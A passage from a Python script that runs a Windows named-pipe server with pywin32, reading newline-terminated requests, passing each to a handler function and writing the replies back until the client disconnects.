            win32pipe.PIPE_TYPE_BYTE | win32pipe.PIPE_READMODE_BYTE | win32pipe.PIPE_WAIT,
            1, 4096, 4096, 0, None)
        win32pipe.ConnectNamedPipe(pipe, None)
        try:
            while True:
                # Accumulate reads until a full newline-terminated request
                # has arrived; requests never span a newline boundary.
                input = b""
                while not input.endswith(b"\n"):
                    result, data = win32file.ReadFile(pipe, 4096)
                    assert result == 0
                    input += data
                    assert b"\n" not in input or input.endswith(b"\n")
                output = (call(input.decode("utf-8")) + "\n").encode("utf-8")
                length = len(output)
                while length > 0:
                    result, done = win32file.WriteFile(pipe, output)
                    assert result == 0
                    length -= done
        except win32file.error as e:
            if e.args[0] == 109:  # ERROR_BROKEN_PIPE
                pass
            else:
                raise


if __name__ == "__main__":
    main()
0.034483